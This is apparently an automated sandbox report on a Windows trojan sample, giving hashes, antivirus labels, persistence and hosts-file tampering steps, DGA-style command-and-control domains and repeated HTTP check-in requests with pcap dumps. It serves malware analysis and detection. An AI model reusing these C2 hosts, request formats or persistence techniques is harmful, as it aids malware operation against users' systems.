Analysis Date2015-07-27 09:05:13
MD529c4a3c13d0695d8b767a5fdb4709df8
SHA105466a9e467d28bd56116475a1ef67d6fb9fe2c7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d7a029bb6b4500153510086d61805d68 sha1: 05f87727b561afca905c9c9d20b4dbe603657ff5 size: 793088
Section.rdata md5: bdfd79c5777dc18ea1ff849f173c8195 sha1: 42aa1df7031e1a141e44c28518bb09254e4122af size: 60928
Section.data md5: 7b6360ed06718ba780509d4caa94db87 sha1: bc1a7c5daf0f6a27a3d334d822fadcb2a54ede62 size: 412160
Timestamp2014-10-30 00:23:42
PackerMicrosoft Visual C++ ?.?
PEhash589c2f91dad9cfa7e01c78608fc6a3299e4cdaf4
IMPhashb3064163ae5d739a760f81326e4c5133
AVAlwil (avast)Downloader-TLD [Trj]
AVEmsisoftGen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVClamAVno_virus
AVF-SecureGen:Variant.Symmi.22722
AVVirusBlokAda (vba32)no_virus
AVDr. WebTrojan.KillFiles.27819
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.AE
AVFortinetW32/Kryptik.DDQD!tr
AVZillya!no_virus
AVAuthentiumW32/Nivdort.A.gen!Eldorado
AVTwisterno_virus
AVGrisoft (avg)Win32/Cryptor
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMcafeeno_virus
AVAvira (antivir)TR/Crypt.ZPACK.133852
AVCAT (quickheal)Trojan.Generic.g3
AVKasperskyTrojan.Win32.Generic
AVIkarusTrojan.Win32.Crypt
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVPadvishno_virus
AVFrisk (f-prot)no_virus
AVCA (E-Trust Ino)no_virus
AVSymantecDownloader.Upatre!g15
AVAd-AwareGen:Variant.Symmi.22722
AVEset (nod32)Win32/Kryptik.CCLE
AVMalwareBytesno_virus
AVBitDefenderGen:Variant.Symmi.22722
AVRisingno_virus
AVK7Trojan ( 0049a7ec1 )
AVTrend MicroTROJ_WONTON.SMJ1

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\rys2jcn1l5qqknxioeihs.exe
Creates FileC:\WINDOWS\system32\cwpxomnzp\tst
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\rys2jcn1l5qqknxioeihs.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\rys2jcn1l5qqknxioeihs.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\DLL Volume WebClient Device WinHTTP ➝
C:\WINDOWS\system32\ygbrqee.exe
Creates FileC:\WINDOWS\system32\cwpxomnzp\lck
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\WINDOWS\system32\cwpxomnzp\tst
Creates FileC:\WINDOWS\system32\ygbrqee.exe
Creates FileC:\WINDOWS\system32\cwpxomnzp\etc
Deletes FileC:\WINDOWS\system32\\drivers\etc\hosts
Creates ProcessC:\WINDOWS\system32\ygbrqee.exe
Creates ServiceExperience Update TP Internet Cache - C:\WINDOWS\system32\ygbrqee.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1212

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1872

Process
↳ Pid 1140

Process
↳ C:\WINDOWS\system32\ygbrqee.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝
1
Creates FileC:\WINDOWS\system32\cwpxomnzp\lck
Creates FileC:\WINDOWS\system32\cwpxomnzp\rng
Creates FileC:\WINDOWS\system32\cwpxomnzp\run
Creates FileC:\WINDOWS\system32\zclyqmiiee.exe
Creates Filepipe\net\NtControlPipe10
Creates FileC:\WINDOWS\TEMP\rys2jcn1rumqkn.exe
Creates FileC:\WINDOWS\system32\cwpxomnzp\tst
Creates FileC:\WINDOWS\system32\cwpxomnzp\cfg
Creates File\Device\Afd\Endpoint
Creates ProcessC:\WINDOWS\TEMP\rys2jcn1rumqkn.exe -r 42951 tcp
Creates ProcessWATCHDOGPROC "c:\windows\system32\ygbrqee.exe"

Process
↳ C:\WINDOWS\system32\ygbrqee.exe

Creates FileC:\WINDOWS\system32\cwpxomnzp\tst

Process
↳ WATCHDOGPROC "c:\windows\system32\ygbrqee.exe"

Creates FileC:\WINDOWS\system32\cwpxomnzp\tst

Process
↳ C:\WINDOWS\TEMP\rys2jcn1rumqkn.exe -r 42951 tcp

Creates File\Device\Afd\Endpoint
Winsock DNS239.255.255.250

Network Details:

DNSsaltsecond.net
Type: A
74.220.199.6
DNSwifefruit.net
Type: A
208.91.197.241
DNSpickgrave.net
Type: A
208.91.197.241
DNSroomstock.net
Type: A
208.91.197.241
DNSwatcheasy.net
Type: A
208.91.197.241
DNSuponmail.net
Type: A
208.91.197.241
DNStakenhand.net
Type: A
208.91.197.241
DNSstorytell.net
Type: A
66.151.181.49
DNSleastcolor.net
Type: A
95.211.230.75
DNSafterhigh.net
Type: A
141.8.224.169
DNSsouthblood.net
Type: A
DNSableread.net
Type: A
DNSwalkbody.net
Type: A
DNSmonthtell.net
Type: A
DNSwalktell.net
Type: A
DNSstorydare.net
Type: A
DNSweakdare.net
Type: A
DNSstorydance.net
Type: A
DNSweakdance.net
Type: A
DNSstorybody.net
Type: A
DNSweakbody.net
Type: A
DNSweaktell.net
Type: A
DNSafterdare.net
Type: A
DNSforcedare.net
Type: A
DNSafterdance.net
Type: A
DNSforcedance.net
Type: A
DNSafterbody.net
Type: A
DNSforcebody.net
Type: A
DNSaftertell.net
Type: A
DNSforcetell.net
Type: A
DNSselldare.net
Type: A
DNSwednesdaydare.net
Type: A
DNSselldance.net
Type: A
DNSwednesdaydance.net
Type: A
DNSsellbody.net
Type: A
DNSwednesdaybody.net
Type: A
DNSselltell.net
Type: A
DNSwednesdaytell.net
Type: A
DNSdrivedare.net
Type: A
DNSnaildare.net
Type: A
DNSdrivedance.net
Type: A
DNSnaildance.net
Type: A
DNSdrivebody.net
Type: A
DNSnailbody.net
Type: A
DNSdrivetell.net
Type: A
DNSnailtell.net
Type: A
DNSfieldfeel.net
Type: A
DNSqueenfeel.net
Type: A
DNSfieldhigh.net
Type: A
DNSqueenhigh.net
Type: A
DNSfieldcolor.net
Type: A
DNSqueencolor.net
Type: A
DNSfieldonly.net
Type: A
DNSqueenonly.net
Type: A
DNSbothfeel.net
Type: A
DNSgainfeel.net
Type: A
DNSbothhigh.net
Type: A
DNSgainhigh.net
Type: A
DNSbothcolor.net
Type: A
DNSgaincolor.net
Type: A
DNSbothonly.net
Type: A
DNSgainonly.net
Type: A
DNSleastfeel.net
Type: A
DNSfacefeel.net
Type: A
DNSleasthigh.net
Type: A
DNSfacehigh.net
Type: A
DNSfacecolor.net
Type: A
DNSleastonly.net
Type: A
DNSfaceonly.net
Type: A
DNSmonthfeel.net
Type: A
DNSwalkfeel.net
Type: A
DNSmonthhigh.net
Type: A
DNSwalkhigh.net
Type: A
DNSmonthcolor.net
Type: A
DNSwalkcolor.net
Type: A
DNSmonthonly.net
Type: A
DNSwalkonly.net
Type: A
DNSstoryfeel.net
Type: A
DNSweakfeel.net
Type: A
DNSstoryhigh.net
Type: A
DNSweakhigh.net
Type: A
DNSstorycolor.net
Type: A
DNSweakcolor.net
Type: A
DNSstoryonly.net
Type: A
DNSweakonly.net
Type: A
DNSafterfeel.net
Type: A
DNSforcefeel.net
Type: A
DNSforcehigh.net
Type: A
DNSaftercolor.net
Type: A
DNSforcecolor.net
Type: A
DNSafteronly.net
Type: A
DNSforceonly.net
Type: A
DNSsellfeel.net
Type: A
DNSwednesdayfeel.net
Type: A
HTTP GEThttp://saltsecond.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://wifefruit.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://pickgrave.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://roomstock.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://watcheasy.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://uponmail.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://takenhand.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://storytell.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://leastcolor.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://afterhigh.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://saltsecond.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://wifefruit.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://pickgrave.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://roomstock.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://watcheasy.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://uponmail.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://takenhand.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://storytell.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
HTTP GEThttp://leastcolor.net/index.php?method=validate&mode=sox&v=033&sox=47ec9801&lenhdr
User-Agent:
Flows TCP192.168.1.1:1036 ➝ 74.220.199.6:80
Flows TCP192.168.1.1:1037 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1038 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1039 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1040 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1041 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1042 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1043 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1045 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1046 ➝ 141.8.224.169:80
Flows TCP192.168.1.1:1047 ➝ 74.220.199.6:80
Flows TCP192.168.1.1:1048 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1049 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1050 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1051 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1052 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1053 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1054 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1055 ➝ 95.211.230.75:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207361 6c747365 636f6e64 2e6e6574   : saltsecond.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207769 66656672 7569742e 6e65740d   : wifefruit.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207069 636b6772 6176652e 6e65740d   : pickgrave.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20726f 6f6d7374 6f636b2e 6e65740d   : roomstock.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207761 74636865 6173792e 6e65740d   : watcheasy.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207570 6f6e6d61 696c2e6e 65740d0a   : uponmail.net..
0x00000080 (00128)   0d0a0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207461 6b656e68 616e642e 6e65740d   : takenhand.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207374 6f727974 656c6c2e 6e65740d   : storytell.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206c65 61737463 6f6c6f72 2e6e6574   : leastcolor.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206166 74657268 6967682e 6e65740d   : afterhigh.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207361 6c747365 636f6e64 2e6e6574   : saltsecond.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207769 66656672 7569742e 6e65740d   : wifefruit.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207069 636b6772 6176652e 6e65740d   : pickgrave.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20726f 6f6d7374 6f636b2e 6e65740d   : roomstock.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207761 74636865 6173792e 6e65740d   : watcheasy.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207570 6f6e6d61 696c2e6e 65740d0a   : uponmail.net..
0x00000080 (00128)   0d0a0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207461 6b656e68 616e642e 6e65740d   : takenhand.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207374 6f727974 656c6c2e 6e65740d   : storytell.net.
0x00000080 (00128)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3326736f   ode=sox&v=033&so
0x00000030 (00048)   783d3437 65633938 3031266c 656e6864   x=47ec9801&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206c65 61737463 6f6c6f72 2e6e6574   : leastcolor.net
0x00000080 (00128)   0d0a0d0a                              ....


Strings